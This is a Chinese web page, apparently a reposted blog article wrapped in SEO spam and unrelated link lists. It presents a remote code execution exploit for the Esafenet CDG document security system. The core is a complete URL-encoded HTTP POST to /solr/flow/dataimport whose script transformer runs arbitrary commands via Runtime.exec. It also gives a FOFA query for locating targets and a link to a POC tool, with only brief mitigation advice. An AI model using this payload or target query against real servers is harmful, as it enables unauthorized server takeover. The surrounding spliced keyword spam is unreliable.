当前位置: 首页 > news >正文

知名高端网站建设企业wordpress文本块表格

知名高端网站建设企业,wordpress文本块表格,重庆有哪些做优化的公司,网站建设方案打包亿赛通电子文档安全管理系统 RCE漏洞 一、 产品简介二、 漏洞概述三、 复现环境四、 漏洞复现小龙POC检测: 五、 修复建议 免责声明#xff1a;请勿利用文章内的相关技术从事非法测试#xff0c;由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失… 亿赛通电子文档安全管理系统 RCE漏洞 一、 产品简介二、 漏洞概述三、 复现环境四、 漏洞复现小龙POC检测: 五、 修复建议 免责声明请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 一、 产品简介 亿赛通电子文档安全管理系统简称CDG是一款电子文档安全加密软件该系统利用驱动层透明加密技术通过对电子文档的加密保护防止内部员工泄密和外部人员非法窃取企业核心重要数据资产对电子文档进行全生命周期防护系统具有透明加密、主动加密、智能加密等多种加密方式用户可根据部门涉密程度的不同如核心部门和普通部门部署力度轻重不一的梯度式文档加密防护实现技术、管理、审计进行有机的结合在内部构建起立体化的整体信息防泄露体系使得成本、效率和安全三者达到平衡实现电子文档的数据安全。 二、 漏洞概述 亿赛通电子文档安全管理系统/solr/flow/dataimport接口处存在远程代码执行漏洞未经授权的攻击者可通过此漏洞执行任意指令从而获取服务器权限。 三、 复现环境 FOFAapp“亿赛通-电子文档安全管理系统” 四、 漏洞复现 burp抓包发送的POC数据 POST /solr/flow/dataimport?commandfull-importverbosefalsecleanfalsecommitfalsedebugtruecoretikanamedataimportdataConfig%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc(row)%7B%0A%20var%20bufReader%20%3D%20new%20java.io.BufferedReader(new%20java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(%22执行的命令%22).getInputStream()))%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile(true)%20%7B%0Avar%20oneline%20%3D%20bufReader.readLine()%3B%0Aresult.push(%20oneline%20)%3B%0Aif(!oneline)%20break%3B%0A%7D%0A%0Arow.put(%22title%22%2Cresult.join(%22%5Cn%5Cr%22))%3B%0Areturn%20row%3B%0A%0A%7D%0A%0A%5D%5D%3E%3C%2Fscript%3E%0A%0A%3Cdocument%3E%0A%20%20%20%20%3Centity%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0A%20%20%20%20%20%20%20%20name%3D%22entity1%22%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0A%20%20%20%20%20%20%20%20forEach%3D%22%2FRDF%2Fitem%22%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Apoc%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cfield%20column%3D%22title%22%20xpath%3D%22%2FRDF%2Fitem%2Ftitle%22%20%2F%3E%0A%20%20%20%20%3C%2Fentity%3E%0A%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.1383.67 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: close Host: your-ip?xml version1.0 encodingUTF-8?RDFitem//RDFburp成功回显截图 ceye后台查看 小龙POC检测: 说明一下由于监管强制要求POC要等护网后才能开放 小龙POC传送门: 小龙POC工具 五、 修复建议 设置安全组仅对可信地址开放 升级至安全版本
http://www.pierceye.com/news/3498/

相关文章:

  • 公司做网站需要准备什么材料小型培训机构管理系统
  • 国外metro风格网站模板动画设计招聘信息
  • 深圳网站设计师培训学校设计网页制作策划路程
  • 个人网站链接怎么做上海企业建站步骤
  • 广州网站建设哪家比较好浦东新区做网站
  • 宜昌网站制作公司排名温州seo推广公司
  • 个人免费网站开发高端品牌网站建设建议
  • 手机网站头部图片怎么做宝安中心区新楼盘
  • 网站设计色板郑州市网站和公众号建设
  • 织梦程序如何搭建网站柳州中小企业网站建设
  • 建设交通人才网站舆情报告模板
  • WordPress去除官网链接网络优化工具app手机版
  • api模式网站开发介绍建站做得好的公司
  • 网站开发的招标参数做女装的网站
  • 广西地矿建设集团有限公司网站专业做室内设计的网站有哪些
  • 网站里的聊天怎么做网站内部链接优化
  • 哲学专业特色建设网站产品如何做网站地图
  • 东莞网站页设计制作网站建设 公司 常见问题
  • 旅游网站建设的建议可以免费发布招聘网站
  • 通化市建设局网站公关做的好的网站
  • 专业网页制作网站推广公司外贸网站建设公司渠道
  • 南通网站建设贵吗网站建设备案书模板
  • 制作企业网站的新闻控制网站的大量访问
  • 58同城石家庄网站建设什么软件制作网站快
  • 响应式网站什么意思广州模板网站建设价格
  • 什么是网络营销?三门峡做网站优化
  • 网站界面建议wordpress 多站点 合集
  • 成都市建设厅官方网站网站备案授权书怎么填
  • 建一个网站 服务器机房托管价格画册设计报价明细表
  • 天圆地方建筑网站荆州市建设厅网站